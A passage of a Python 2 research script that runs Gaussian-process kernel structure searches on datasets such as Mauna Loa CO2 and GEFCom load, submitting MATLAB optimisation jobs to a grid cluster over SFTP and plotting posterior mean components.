    over kernel structures on a subsampled Mauna dataset.'''
    seed_kernels = [fk.SqExpKernel(0, 0)]
    X, y = load_mauna_original()
    N_orig = X.shape[0] # subsample data.
    X = X[:N_orig//3, :]
    y = y[:N_orig//3, :]
    max_depth = 4
    k = 4 # Expand k best
    # Indices into the result tuples produced by try_expanded_kernels.
    nll_key = 1
    laplace_key = 2
    results = []
    for dummy in range(max_depth):
        # NOTE(review): structure_search is not imported by name in this file;
        # presumably it arrives via one of the star imports — verify.
        new_results = structure_search.try_expanded_kernels(X, y, D=2, seed_kernels=seed_kernels, verbose=False)
        results = results + new_results
        print
        results = sorted(results, key=lambda p: p[nll_key], reverse=True)
        for kernel, nll, laplace in results:
            print nll, laplace, kernel.pretty_print()
        # Next round seeds from the k best (lowest NLL) of this round only.
        seed_kernels = [r[0] for r in sorted(new_results, key=lambda p: p[nll_key])[0:k]]
def plot_Carls_kernel():
    '''Plot the covariance function of Carl's Mauna Loa kernel.'''
    kernel = fk.Carls_Mauna_kernel()
    X = np.linspace(0, 10, 1000)
    sigma = gpml.plot_kernel(kernel, X)
    pylab.figure()
    pylab.plot(X, sigma)
    # Bug fix: 'Carl''s kernel' concatenated to "Carls kernel" in Python —
    # escape the apostrophe. Stray trailing semicolon dropped.
    pylab.title('Carl\'s kernel')
def plot_our_kernel():
    '''Plot the covariance function of the best kernel found for Mauna Loa.'''
    kernel = ( fk.SqExpKernel(-0.7, -1.3) + fk.SqExpKernel(4.8, 2.3) ) * \
             ( fk.SqExpKernel(3.0, 0.5) + fk.SqExpPeriodicKernel(0.4, -0.0, -0.9) )
    X = np.linspace(0,10,1000)
    sigma = gpml.plot_kernel(kernel, X)
    pylab.figure()
    pylab.plot(X, sigma)
    pylab.title('Our kernel');
def load_simple_gef_load():
    '''Zone 1 and temperature station 2: load the simple GEF dataset and
    return its (X, y) arrays.'''
    contents = scipy.io.loadmat('../data/gef_load_simple.mat')
    return contents['X'], contents['y']
def load_full_gef_load():
    '''20 Zones in y, time and 11 temp stations in X: load the full GEF
    dataset and return its (X, y) arrays.'''
    contents = scipy.io.loadmat('../data/gef_load_full_Xy.mat')
    return contents['X'], contents['y']
def simple_gef_load_experiment(verbose=True):
    '''A first version of an experiment learning kernels: greedy beam search
    in 2 dimensions on the simple GEF load dataset, ranked by BIC.'''
    seed_kernels = [fk.MaskKernel(2, 0, fk.SqExpKernel(0, 0)),
                    fk.MaskKernel(2, 1, fk.SqExpKernel(0, 0))]
    X, y = load_simple_gef_load()
    # subsample data.
    X = X[0:99, :]
    y = y[0:99, :]
    max_depth = 5
    k = 2 # Expand k best
    # Indices into the result tuples; ranking is done on BIC.
    nll_key = 1
    BIC_key = 2
    active_key = BIC_key
    results = []
    for dummy in range(max_depth):
        # NOTE(review): structure_search is not imported by name in this file;
        # presumably it arrives via one of the star imports — verify.
        new_results = structure_search.try_expanded_kernels(X, y, D=2, seed_kernels=seed_kernels, verbose=verbose)
        results = results + new_results
        print
        results = sorted(results, key=lambda p: p[active_key], reverse=True)
        for kernel, nll, BIC in results:
            print nll, BIC, kernel.pretty_print()
        # Next round seeds from the k best of this round only.
        seed_kernels = [r[0] for r in sorted(new_results, key=lambda p: p[active_key])[0:k]]
def full_gef_load_experiment(zone=1, max_depth=5, verbose=True):
    '''Round 2: greedy beam search on the full 12-dimensional GEF load
    dataset for one output zone, ranked by BIC.'''
#    seed_kernels = [fk.MaskKernel(2, 0, fk.SqExpKernel(0, 0)),
#                    fk.MaskKernel(2, 1, fk.SqExpKernel(0, 0))]
    # One SqExp, one periodic and one RQ kernel per input dimension.
    seed_kernels = [fk.MaskKernel(12, i, fk.SqExpKernel(0., 0.)) for i in range(12)] + \
                   [fk.MaskKernel(12, i, fk.SqExpPeriodicKernel(0., 0., 0.)) for i in range(12)] + \
                   [fk.MaskKernel(12, i, fk.RQKernel(0., 0., 0.)) for i in range(12)]
    X, y = load_full_gef_load()
    # subsample data.
    X = X[0:299, :]
    y = y[0:299, zone-1]
#    max_depth = 5
    k = 2 # Expand k best
    nll_key = 1
    BIC_key = 2
    active_key = BIC_key
    results = []
    for i in range(max_depth):
        # First round evaluates the seeds as-is; later rounds expand them.
        if i:
            expand = True
        else:
            expand = False
        # NOTE(review): structure_search is not imported by name in this file;
        # presumably it arrives via one of the star imports — verify.
        new_results = structure_search.try_expanded_kernels(X, y, D=12, seed_kernels=seed_kernels, expand=expand, verbose=verbose)
        results = results + new_results
        print
        results = sorted(results, key=lambda p: p[active_key], reverse=True)
        for kernel, nll, BIC in results:
            print nll, BIC, kernel.pretty_print()
        seed_kernels = [r[0] for r in sorted(new_results, key=lambda p: p[active_key])[0:k]]
#os.system(command_str)
#### Attempt at sending individual jobs to the cluster
import pysftp, tempfile, config, subprocess, config, time
nax = np.newaxis
def mkstemp_safe(directory, suffix):
    '''Create a named temporary file in *directory* and return its path.

    The OS-level handle returned by mkstemp is closed immediately, so the
    file can later be re-opened (or handed to external tools) without
    leaking a descriptor.
    '''
    handle, path = tempfile.mkstemp(dir=directory, suffix=suffix)
    os.close(handle)
    return path
def fear_connect():
    '''Open an SFTP/SSH connection to the fear cluster using the credentials
    stored in the config module; caller is responsible for closing it.'''
    return pysftp.Connection('fear', username=config.USERNAME, password=config.PASSWORD)
def fear_command(cmd, fear=None):
    '''Execute *cmd* on fear and return its output.

    Reuses an existing connection when one is supplied via *fear*;
    otherwise opens a throwaway connection and closes it before returning.
    '''
    srv = fear if fear is not None else fear_connect()
    output = srv.execute(cmd)
    if fear is None:
        srv.close()
    return output
def copy_to_fear(local_path, remote_path, fear=None):
    '''Upload *local_path* to *remote_path* on fear.

    Reuses an existing connection when one is supplied via *fear*;
    otherwise opens a throwaway connection and closes it before returning.
    '''
    srv = fear if fear is not None else fear_connect()
    srv.put(local_path, remote_path)
    if fear is None:
        srv.close()
def copy_from_fear(remote_path, local_path, fear=None):
    '''Download *remote_path* from fear to *local_path*.

    Reuses an existing connection when one is supplied via *fear*;
    otherwise opens a throwaway connection and closes it before returning.
    '''
    srv = fear if fear is not None else fear_connect()
    srv.get(remote_path, local_path)
    if fear is None:
        srv.close()
def fear_rm(remote_path, fear=None):
    '''Remove *remote_path* on fear and return the command output.

    Reuses an existing connection when one is supplied via *fear*;
    otherwise opens a throwaway connection and closes it before returning.
    '''
    srv = fear if fear is not None else fear_connect()
    output = srv.execute('rm %s' % remote_path)
    if fear is None:
        srv.close()
    return output
def fear_file_exists(remote_path, fear=None):
    '''Return True iff *remote_path* exists on fear.

    Runs a small shell test remotely and checks for the literal 'exists'
    line it echoes on success.
    '''
    srv = fear if fear is not None else fear_connect()
    response = srv.execute('if [ -e %s ] \nthen \necho ''exists'' \nfi' % remote_path)
    if fear is None:
        srv.close()
    return response == ['exists\n']
def fear_qdel_all(fear=None):
    '''Cancel every grid-engine job belonging to the configured user.

    Reuses an existing connection when one is supplied via *fear*;
    otherwise opens a throwaway connection and closes it before returning.
    '''
    srv = fear if fear is not None else fear_connect()
    output = srv.execute('. /usr/local/grid/divf2/common/settings.sh; qdel -u %s' % config.USERNAME)
    if fear is None:
        srv.close()
    return output
def qsub_matlab_code(code, verbose=True, local_dir ='../temp/', remote_dir ='./temp/', fear=None):
    '''Write *code* to a temp MATLAB script, wrap it in a shell launcher,
    copy both to fear and submit the launcher via qsub.

    Returns (script_file, shell_file): the local paths of the two temp files
    so the caller can clean them up once the job has finished.
    '''
    # Write to a temp script
    script_file = mkstemp_safe(local_dir, '.m')
    shell_file = mkstemp_safe(local_dir, '.sh')
    f = open(script_file, 'w')
    f.write(code)
    f.close()
    #### Local file reference without extension - MATLAB fails silently otherwise
    f = open(shell_file, 'w')
    f.write('/usr/local/apps/matlab/matlabR2011b/bin/matlab -nosplash -nojvm -nodisplay -singleCompThread -r ' + script_file.split('/')[-1].split('.')[0] + '\n')
    f.close()
    # Copy this to fear
    copy_to_fear(script_file, remote_dir + script_file.split('/')[-1], fear)
    copy_to_fear(shell_file, remote_dir + shell_file.split('/')[-1], fear)
    # Create fear call
    #### WARNING - hardcoded path 'temp'
    # NOTE(review): there is no comma after 'cd temp;' so it concatenates
    # with the chmod string into one element — harmless in shell, but it
    # looks accidental; confirm before editing.
    fear_string = ' '.join(['. /usr/local/grid/divf2/common/settings.sh;',
                            'cd temp;'
                            'chmod +x %s;' % shell_file.split('/')[-1],
                            'qsub -l lr=0',
                            shell_file.split('/')[-1] + ';',
                            'cd ..'])
    if verbose:
        print 'Submitting : %s' % fear_string
    # Send this command to fear
    fear_command(fear_string, fear)
    # Tell the caller where the script file was written
    return script_file, shell_file
def re_qsub(shell_file, verbose=True, fear=None):
    '''Re-submit an already-uploaded shell launcher to the grid engine
    (used when a job appears to have stalled or been lost).'''
    # Create fear call
    #### WARNING - hardcoded path 'temp'
    # NOTE(review): as in qsub_matlab_code, 'cd temp;' and the chmod string
    # concatenate due to a missing comma — harmless but looks accidental.
    fear_string = ' '.join(['. /usr/local/grid/divf2/common/settings.sh;',
                            'cd temp;'
                            'chmod +x %s;' % shell_file.split('/')[-1],
                            'qsub -l lr=0',
                            shell_file.split('/')[-1] + ';',
                            'cd ..'])
    if verbose:
        print 'Re-submitting : %s' % fear_string
    # Send this command to fear
    fear_command(fear_string, fear)
# Matlab code to optimise hyper-parameters on one file, given one kernel.
# Template placeholders (filled in via %-interpolation):
#   datafile      - .mat file containing X and y
#   gpml_path     - root of the GPML toolbox on the remote machine
#   kernel_family - GPML covariance-function expression
#   kernel_params - initial hyperparameter vector as a MATLAB literal
#   noise         - initial log noise level for likGauss
#   iters         - maximum number of minimize() iterations
#   writefile     - .mat file to save optimised hypers and NLLs into
# The bare 'a = ...' assignments are progress markers in the MATLAB log.
OPTIMIZE_KERNEL_CODE = r"""
%% Load the data, it should contain X and y.
a = 'trying to load data files'
load '%(datafile)s'
a = 'loaded data files'
%% Load GPML
addpath(genpath('%(gpml_path)s'));
a = 'loaded GPML'
%% Set up model.
meanfunc = {@meanConst}
hyp.mean = mean(y)
covfunc = %(kernel_family)s
hyp.cov = %(kernel_params)s
likfunc = @likGauss
hyp.lik = %(noise)s
[hyp_opt, nlls] = minimize(hyp, @gp, -%(iters)s, @infExact, meanfunc, covfunc, likfunc, X, y);
best_nll = nlls(end)
laplace_nle = best_nll %% HACK HACK HACK
save( '%(writefile)s', 'hyp_opt', 'best_nll', 'nlls', 'laplace_nle' );
a = 'Goodbye, World!'
exit();
"""
def fear_run_experiments(kernels, X, y, return_all=False, verbose=True, noise=None, iters=300, local_dir ='../temp/', remote_dir ='./temp/', \
                         sleep_time=10, n_sleep_timeout=6, re_submit_wait=60):
    '''
    Sends jobs to fear, waits for them, returns the results.

    One MATLAB hyperparameter-optimisation job is submitted per kernel; the
    function then polls for result files, re-submitting unfinished jobs if
    nothing completes for n_sleep_timeout sleep intervals. Returns a list of
    (optimised_kernel, nll, laplace_nle, BIC) tuples, one per input kernel.

    NOTE(review): the return_all parameter is never used in this body.
    '''
    # Not sure what this is for
    if X.ndim == 1:
        X = X[:, nax]
    if y.ndim == 1:
        y = y[:, nax]
    if noise is None:
        noise = np.log(np.var(y)/10) #### Just a heuristic.
    data = {'X': X, 'y': y}
    # Setup the connection to fear
    fear = fear_connect()
    # Submit all the jobs and remember where we put them
    data_files = []
    write_files = []
    script_files = []
    shell_files = []
    for kernel in kernels:
        # Create data file and results file
        data_files.append(mkstemp_safe(local_dir, '.mat'))
        write_files.append(mkstemp_safe(local_dir, '.mat'))
        # Save data
        scipy.io.savemat(data_files[-1], data)
        # Copy files to fear
        copy_to_fear(data_files[-1], remote_dir + data_files[-1].split('/')[-1], fear)
#        copy_to_fear(write_files[-1], remote_dir + write_files[-1].split('/')[-1])
        # Create MATLAB code
        code = OPTIMIZE_KERNEL_CODE % {'datafile': data_files[-1].split('/')[-1],
                                       'writefile': write_files[-1].split('/')[-1],
                                       'gpml_path': config.FEAR_GPML_PATH,
                                       'kernel_family': kernel.gpml_kernel_expression(),
                                       'kernel_params': '[ %s ]' % ' '.join(str(p) for p in kernel.param_vector()),
                                       'noise': str(noise),
                                       'iters': str(iters)}
        # Submit this to fear and save the file names
        script_file, shell_file = qsub_matlab_code(code=code, verbose=verbose, local_dir=local_dir, remote_dir=remote_dir, fear=fear)
        script_files.append(script_file)
        shell_files.append(shell_file)
    # Let the scripts run
#    if verbose:
#        print 'Giving the jobs some time to run'
#    time.sleep(re_submit_wait)
    # Wait for and read in results
    fear_finished = False
    job_finished = [False] * len(write_files)
    results = [None] * len(write_files)
    sleep_count = 0
    while not fear_finished:
        for (i, write_file) in enumerate(write_files):
            if not job_finished[i]:
                # A job is done when its result file appears remotely.
                if fear_file_exists(remote_dir + write_file.split('/')[-1], fear):
                    # Another job has finished
                    job_finished[i] = True
                    sleep_count = 0
                    # Copy files
                    os.remove(write_file) # Not sure if necessary
                    copy_from_fear(remote_dir + write_file.split('/')[-1], write_file, fear)
                    # Read results ##### THIS WILL CHANGE IF RUNNING DIFFERENT TYPE OF EXPERIMENT
                    gpml_result = scipy.io.loadmat(write_file)
                    optimized_hypers = gpml_result['hyp_opt']
                    nll = gpml_result['best_nll'][0, 0]
#                    nlls = gpml_result['nlls'].ravel()
                    laplace_nle = gpml_result['laplace_nle'][0, 0]
                    kernel_hypers = optimized_hypers['cov'][0, 0].ravel()
                    k_opt = kernels[i].family().from_param_vector(kernel_hypers)
                    # BIC = 2*NLL + (number of params) * log(number of data).
                    BIC = 2 * nll + len(kernel_hypers) * np.log(y.shape[0])
                    results[i] = (k_opt, nll, laplace_nle, BIC)
                    # Tidy up
                    fear_rm(remote_dir + data_files[i].split('/')[-1], fear)
                    fear_rm(remote_dir + write_files[i].split('/')[-1], fear)
                    fear_rm(remote_dir + script_files[i].split('/')[-1], fear)
                    fear_rm(remote_dir + shell_files[i].split('/')[-1], fear)
                    fear_rm(remote_dir + shell_files[i].split('/')[-1] + '*', fear)
                    os.remove(data_files[i])
                    os.remove(write_files[i])
                    os.remove(script_files[i])
                    os.remove(shell_files[i])
                    # Tell the world
                    if verbose:
                        print '%d / %d jobs complete' % (sum(job_finished), len(job_finished))
                    if sum(job_finished) == len(job_finished):
                        fear_finished = True
        if not fear_finished:
            if verbose:
                print 'Sleeping'
            sleep_count += 1
            if sleep_count < n_sleep_timeout:
                time.sleep(sleep_time)
            else:
                # Jobs taking too long - assume failure - resubmit
                fear_qdel_all(fear)
                for (i, shell_file) in enumerate(shell_files):
                    if not job_finished[i]:
                        re_qsub(shell_file, verbose=verbose, fear=fear)
                if verbose:
                    print 'Giving the jobs some time to run'
                time.sleep(re_submit_wait)
                sleep_count = 0
    fear.close()
    return results
def fear_load_mat(data_file, y_dim=1):
    '''Load a Matlab file; returns (X, selected y column, number of input
    dimensions). *y_dim* is 1-indexed.'''
    contents = scipy.io.loadmat(data_file)
    X = contents['X']
    y_column = contents['y'][:, y_dim - 1]
    return X, y_column, X.shape[1]
def fear_expand_kernels(D, seed_kernels, verbose=False):
    '''
    Expand each seed kernel one step through the D-dimensional grammar and
    return the de-duplicated list of candidate kernels (printing the seeds
    and the expansion as a side effect).
    '''
    g = grammar.MultiDGrammar(D)
    print 'Seed kernels :'
    for k in seed_kernels:
        print k.pretty_print()
    kernels = []
    for k in seed_kernels:
        kernels = kernels + grammar.expand(k, g)
    kernels = grammar.remove_duplicates(kernels)
    print 'Expanded kernels :'
    for k in kernels:
        print k.pretty_print()
    return (kernels)
def fear_experiment(data_file, results_filename, y_dim=1, subset=None, max_depth=2, k=2, verbose=True, sleep_time=60, n_sleep_timeout=20, re_submit_wait=60, \
                    description=''):
    '''Recursively search for the best kernel.

    Runs a greedy beam search of depth *max_depth*, evaluating candidates on
    the fear cluster and expanding the *k* best (by BIC) at each level, then
    writes the per-level rankings to *results_filename*.
    '''
    X, y, D = fear_load_mat(data_file, y_dim)
    # Subset if necessary
    if not subset is None:
        X = X[subset, :]
        y = y[subset]
    ##### This should be abstracted
    seed_kernels = [fk.MaskKernel(D, i, fk.SqExpKernel(0., 0.)) for i in range(D)] + \
                   [fk.MaskKernel(D, i, fk.SqExpPeriodicKernel(0., 0., 0.)) for i in range(D)] + \
                   [fk.MaskKernel(D, i, fk.RQKernel(0., 0., 0.)) for i in range(D)]
    # Indices into the (kernel, nll, laplace, BIC) result tuples.
    nll_key = 1
    laplace_key = 2
    BIC_key = 3
    active_key = BIC_key
    results = []
    results_sequence = []
    for r in range(max_depth):
        # Level 0 evaluates the seeds directly; later levels expand first.
        if r == 0:
            new_results = fear_run_experiments(seed_kernels, X, y, verbose=verbose, \
                                               sleep_time=sleep_time, n_sleep_timeout=n_sleep_timeout, re_submit_wait=re_submit_wait)
        else:
            new_results = fear_run_experiments(fear_expand_kernels(D, seed_kernels, verbose=verbose), X, y, verbose=verbose, \
                                               sleep_time=sleep_time, n_sleep_timeout=n_sleep_timeout, re_submit_wait=re_submit_wait)
        results = results + new_results
        print
        results = sorted(results, key=lambda p: p[active_key], reverse=True)
        for kernel, nll, laplace, BIC in results:
            print nll, laplace, BIC, kernel.pretty_print()
        # NOTE(review): the comprehension variable r leaks in Python 2 and
        # shadows the loop index; harmless here since the for loop rebinds r
        # each iteration, but worth renaming.
        seed_kernels = [r[0] for r in sorted(new_results, key=lambda p: p[active_key])[0:k]]
        results_sequence.append(results)
    # Write results to a file
    results = sorted(results, key=lambda p: p[active_key], reverse=True)
    with open(results_filename, 'w') as outfile:
        outfile.write('Experiment results for\n datafile = %s\n y_dim = %d\n subset = %s\n max_depth = %f\n k = %f\n Description = %s\n\n' % (data_file, y_dim, subset, max_depth, k, description))
        for (i, results) in enumerate(results_sequence):
            outfile.write('\n%%%%%%%%%% Level %d %%%%%%%%%%\n\n' % i)
            for kernel, nll, laplace, BIC in results:
                outfile.write( 'nll=%f, laplace=%f, BIC=%f, kernel=%s\n' % (nll, laplace, BIC, kernel.__repr__()))
from mpl_toolkits.axes_grid1 import host_subplot
import mpl_toolkits.axisartist as AA
import matplotlib.pyplot as plt
def plot_gef_load_Z01_raw():
    '''Plot the first 499 points of GEF zone-1 load against time with the
    temperature of station T09 on a twin y-axis.'''
    X, y, D = fear_load_mat('../data/gef_load_full_Xy.mat', 1)
    host = host_subplot(111, axes_class=AA.Axes)
    plt.subplots_adjust(right=0.85)
    par1 = host.twinx()
#    host.set_xlim(0, 2)
#    host.set_ylim(0, 2)
    host.set_xlabel("Time")
    host.set_ylabel("Load (Z01)")
    par1.set_ylabel("Temperature (T09)")
    p1, = host.plot(X[0:499,0], y[0:499])
    p2, = par1.plot(X[0:499,0], X[0:499,9])
#    par1.set_ylim(0, 4)
    host.legend()
    # Colour each axis label to match its line.
    host.axis["left"].label.set_color(p1.get_color())
    par1.axis["right"].label.set_color(p2.get_color())
    plt.draw()
    plt.show()
def plot_gef_load_Z01_split_mean():
    '''Split the learnt GEF zone-1 kernel into its periodic and smooth
    additive parts and plot each component's posterior mean on twin axes.'''
    X, y, D = fear_load_mat('../data/gef_load_full_Xy.mat', 1)
    # Full learnt kernel (hyperparameters from a previous search run).
    kernel = fk.MaskKernel(D, 0, fk.RQKernel(0.268353, -0.104149, -2.105742)) * fk.MaskKernel(D, 9, fk.SqExpKernel(1.160242, 0.004344)) * \
             (fk.MaskKernel(D, 0, fk.SqExpPeriodicKernel(-0.823413, 0.000198, -0.917064)) + fk.MaskKernel(D, 0, fk.RQKernel(-0.459219, -0.077250, -2.212718)))
    # kernel_1 keeps only the periodic summand; kernel_2 only the RQ one.
    kernel_1 = fk.MaskKernel(D, 0, fk.RQKernel(0.268353, -0.104149, -2.105742)) * fk.MaskKernel(D, 9, fk.SqExpKernel(1.160242, 0.004344)) * \
               fk.MaskKernel(D, 0, fk.SqExpPeriodicKernel(-0.823413, 0.000198, -0.917064))
    posterior_mean_1 = gpml.posterior_mean(kernel, kernel_1, X[0:499,:], y[0:499])
    kernel_2 = fk.MaskKernel(D, 0, fk.RQKernel(0.268353, -0.104149, -2.105742)) * fk.MaskKernel(D, 9, fk.SqExpKernel(1.160242, 0.004344)) * \
               fk.MaskKernel(D, 0, fk.RQKernel(-0.459219, -0.077250, -2.212718))
    posterior_mean_2 = gpml.posterior_mean(kernel, kernel_2, X[0:499,:], y[0:499])
    host = host_subplot(111, axes_class=AA.Axes)
    plt.subplots_adjust(right=0.85)
    par1 = host.twinx()
#    host.set_xlim(0, 2)
#    host.set_ylim(0, 2)
    host.set_xlabel("Time")
    host.set_ylabel("Periodic component")
    plt.title('Posterior mean functions')
    par1.set_ylabel("Smooth component")
    p1, = host.plot(X[0:499,0], posterior_mean_1)
    p2, = par1.plot(X[0:499,0], posterior_mean_2)
#    par1.set_ylim(0, 4)
    host.legend()
    host.axis["left"].label.set_color(p1.get_color())
    par1.axis["right"].label.set_color(p2.get_color())
    plt.draw()
    plt.show()
def plot_gef_load_Z01_split_mean_temp():
    '''Plot the smooth component's posterior mean of the learnt GEF zone-1
    kernel against temperature (T09), overlaid on the raw load data.'''
    X, y, D = fear_load_mat('../data/gef_load_full_Xy.mat', 1)
    # Full learnt kernel (hyperparameters from a previous search run).
    kernel = fk.MaskKernel(D, 0, fk.RQKernel(0.268353, -0.104149, -2.105742)) * fk.MaskKernel(D, 9, fk.SqExpKernel(1.160242, 0.004344)) * \
             (fk.MaskKernel(D, 0, fk.SqExpPeriodicKernel(-0.823413, 0.000198, -0.917064)) + fk.MaskKernel(D, 0, fk.RQKernel(-0.459219, -0.077250, -2.212718)))
    kernel_1 = fk.MaskKernel(D, 0, fk.RQKernel(0.268353, -0.104149, -2.105742)) * fk.MaskKernel(D, 9, fk.SqExpKernel(1.160242, 0.004344)) * \
               fk.MaskKernel(D, 0, fk.SqExpPeriodicKernel(-0.823413, 0.000198, -0.917064))
    # NOTE(review): posterior_mean_1 is computed but never plotted below.
    posterior_mean_1 = gpml.posterior_mean(kernel, kernel_1, X[0:499,:], y[0:499], iters=10)
    kernel_2 = fk.MaskKernel(D, 0, fk.RQKernel(0.268353, -0.104149, -2.105742)) * fk.MaskKernel(D, 9, fk.SqExpKernel(1.160242, 0.004344)) * \
               fk.MaskKernel(D, 0, fk.RQKernel(-0.459219, -0.077250, -2.212718))
    posterior_mean_2 = gpml.posterior_mean(kernel, kernel_2, X[0:499,:], y[0:499], iters=10)
    plt.figure()
    host = host_subplot(111, axes_class=AA.Axes)
    plt.subplots_adjust(right=0.85)
    par1 = host.twinx()
#    host.set_xlim(0, 2)
#    host.set_ylim(0, 2)
    host.set_xlabel("Temperature (T09)")
#    par1.set_ylabel("Periodic component")
    plt.title('Posterior mean function')
    host.set_ylabel("Load posterior mean")
    p2, = host.plot(X[0:499,9], y[0:499], 'o', alpha=0.5)
    p1, = host.plot(X[0:499,9], posterior_mean_2, 'o')
#    par1.set_ylim(0, 4)
    host.legend()
    host.axis["left"].label.set_color(p1.get_color())
#    par1.axis["right"].label.set_color(p2.get_color())
    plt.draw()
    plt.show()
def plot_gef_load_Z01_smooth_2d_mean():
    '''Evaluate the smooth component's posterior mean on a (time x
    temperature) grid and save the surface to temp_data.mat for plotting
    in MATLAB.'''
    X, y, D = fear_load_mat('../data/gef_load_full_Xy.mat', 1)
    # Full learnt kernel (hyperparameters from a previous search run).
    kernel = fk.MaskKernel(D, 0, fk.RQKernel(0.268353, -0.104149, -2.105742)) * fk.MaskKernel(D, 9, fk.SqExpKernel(1.160242, 0.004344)) * \
             (fk.MaskKernel(D, 0, fk.SqExpPeriodicKernel(-0.823413, 0.000198, -0.917064)) + fk.MaskKernel(D, 0, fk.RQKernel(-0.459219, -0.077250, -2.212718)))
    # Smooth (RQ) component only.
    kernel_2 = fk.MaskKernel(D, 0, fk.RQKernel(0.268353, -0.104149, -2.105742)) * fk.MaskKernel(D, 9, fk.SqExpKernel(1.160242, 0.004344)) * \
               fk.MaskKernel(D, 0, fk.RQKernel(-0.459219, -0.077250, -2.212718))
    # (The unused periodic-only kernel_1 from the original has been removed.)
    min_T = -3.0
    max_T = 1.0
    N_T = 10
    # Query grid: the first 499 rows repeated for each of N_T temperature
    # levels, with column 9 (T09) overwritten by the level.
    temps = np.repeat(np.linspace(min_T, max_T, N_T), 499)
    # Renamed from 'input', which shadowed the builtin of the same name.
    query_points = np.tile(X[0:499,:], (N_T, 1))
    query_points[:,9] = temps
    posterior_mean = gpml.posterior_mean(kernel, kernel_2, X[0:499,:], y[0:499], query_points, iters=300)
    X_plt = X[0:499,0]
    Y_plt = np.linspace(min_T, max_T, N_T)
    Z_plt = np.reshape(posterior_mean, (N_T, 499), 'A')
    data = {'X': X_plt, 'Y': Y_plt, 'Z': Z_plt, 'post_mean': posterior_mean}
    scipy.io.savemat('temp_data.mat', data)
def plot_gef_load_Z01():
    '''Plot the first 500 points of GEF zone-1 load (the commented-out code
    below also sampled from and decomposed the learnt kernel).'''
    # This kernel was chosen from a run of gef_load datapoints.
    # kernel = eval(ProductKernel([ covMask(ndim=12, active_dimension=0, base_kernel=RQKernel(lengthscale=0.268353, output_variance=-0.104149, alpha=-2.105742)), covMask(ndim=12, active_dimension=9, base_kernel=SqExpKernel(lengthscale=1.160242, output_variance=0.004344)), SumKernel([ covMask(ndim=12, active_dimension=0, base_kernel=SqExpPeriodicKernel(lengthscale=-0.823413, period=0.000198, output_variance=-0.917064)), covMask(ndim=12, active_dimension=0, base_kernel=RQKernel(lengthscale=-0.459219, output_variance=-0.077250, alpha=-2.212718)) ]) ]))
    X, y, D = fear_load_mat('../data/gef_load_full_Xy.mat', 1)
    kernel = fk.MaskKernel(D, 0, fk.RQKernel(0.268353, -0.104149, -2.105742)) * fk.MaskKernel(D, 9, fk.SqExpKernel(1.160242, 0.004344)) * \
             (fk.MaskKernel(D, 0, fk.SqExpPeriodicKernel(-0.823413, 0.000198, -0.917064)) + fk.MaskKernel(D, 0, fk.RQKernel(-0.459219, -0.077250, -2.212718)))
    # Todo: set random seed.
    # NOTE(review): this sample is drawn but never plotted (only the raw
    # data is) — the plotting code for it is commented out below.
    sample = gpml.sample_from_gp_prior(kernel, X[0:499,:])
    pylab.figure()
    pylab.plot(X[0:499,0], y[0:499])
    pylab.title('GEFCom2012 Z01 and T09 - first 500 data points')
    pylab.xlabel('Time')
    pylab.ylabel('Load')
#    pylab.figure()
#    pylab.plot(X[0:499,0], sample)
#    pylab.title('GEF load Z01 - a sample from the learnt kernel')
#    pylab.xlabel('Time')
#    pylab.ylabel('Load')
#
#    kernel_1 = fk.MaskKernel(D, 0, fk.RQKernel(0.268353, -0.104149, -2.105742)) * fk.MaskKernel(D, 9, fk.SqExpKernel(1.160242, 0.004344)) * \
#               fk.MaskKernel(D, 0, fk.SqExpPeriodicKernel(-0.823413, 0.000198, -0.917064))
#
#    posterior_mean_1 = gpml.posterior_mean(kernel, kernel_1, X[0:499,:], y[0:499])
#
#    pylab.figure()
#    pylab.plot(X[0:499,0], posterior_mean_1)
#    pylab.title('GEF load Z01 - periodic posterior mean component')
#    pylab.xlabel('Time')
#    pylab.ylabel('Load')
#
#    kernel_2 = fk.MaskKernel(D, 0, fk.RQKernel(0.268353, -0.104149, -2.105742)) * fk.MaskKernel(D, 9, fk.SqExpKernel(1.160242, 0.004344)) * \
#               fk.MaskKernel(D, 0, fk.RQKernel(-0.459219, -0.077250, -2.212718))
#
#    posterior_mean_2 = gpml.posterior_mean(kernel, kernel_2, X[0:499,:], y[0:499])
#
#    pylab.figure()
#    pylab.plot(X[0:499,0], posterior_mean_2)
#    pylab.title('GEF load Z01 - smooth posterior mean component')
#    pylab.xlabel('Time')
#    pylab.ylabel('Load')
def main():
    '''Entry point: run the currently-enabled fear experiment(s). The
    commented lines are the other datasets this script has been run on.'''
    # Run everything
#    fear_experiment('../data/abalone_500.mat', '../results/abalone_500_01.txt', max_depth=4, k=3)
#    fear_experiment('../data/gef_load_full_Xy.mat', '../results/gef_load_500_Z01_02.txt', max_depth=6, k=5, subset=range(500), y_dim=1, description = 'BIC, 0 init')
#    fear_experiment('../data/gef_load_full_Xy.mat', '../results/gef_load_500_Z09_02.txt', max_depth=6, k=5, subset=range(500), y_dim=9, description = 'BIC, 0 init')
    fear_experiment('../data/bach_synth_r_200.mat', '../results/bach_synth_r_200_test.txt', max_depth=2, k=1, description = 'Dave test')
#    fear_experiment('../data/housing.mat', '../results/housing_02.txt', max_depth=6, k=5, description = 'BIC, 0 init')
#    fear_experiment('../data/mauna2003.mat', '../results/mauna2003_02.txt', max_depth=6, k=5, description = 'BIC, 0 init')
#    fear_experiment('../data/mauna2011.mat', '../results/mauna2011_02.txt', max_depth=6, k=5, description = 'BIC, 0 init')
#    fear_experiment('../data/prostate.mat', '../results/prostate_02.txt', max_depth=6, k=5, description = 'BIC, 0 init')
#    fear_experiment('../data/pumadyn256.mat', '../results/pumadyn256_02.txt', max_depth=6, k=5, description = 'BIC, 0 init')
#    fear_experiment('../data/r_concrete_100.mat', '../results/r_concrete_100_02.txt', max_depth=6, k=5, description = 'BIC, 0 init')
#    fear_experiment('../data/r_concrete_500.mat', '../results/r_concrete_500_02.txt', max_depth=6, k=5, description = 'BIC, 0 init')
#    fear_experiment('../data/r_solar_500.mat', '../results/r_solar_500_02.txt', max_depth=6, k=5, description = 'BIC, 0 init')
#    fear_experiment('../data/unicycle_pitch_angle_400.mat', '../results/unicycle_pitch_angle_400_02.txt', max_depth=6, k=5, description = 'BIC, 0 init')
#    fear_experiment('../data/unicycle_pitch_ang_vel_400.mat', '../results/unicycle_pitch_ang_vel_400_02.txt', max_depth=6, k=5, description = 'BIC, 0 init')
def debug_laplace():
    '''Re-evaluate a kernel whose Laplace NLE looked suspicious by re-running
    its MATLAB optimisation on the cluster and printing the result/Hessian.'''
    # Load data set
    X, y, D, Xtest, ytest = gpml.load_mat('../data/kfold_data/r_concrete_500_fold_10_of_10.mat', y_dim=1)
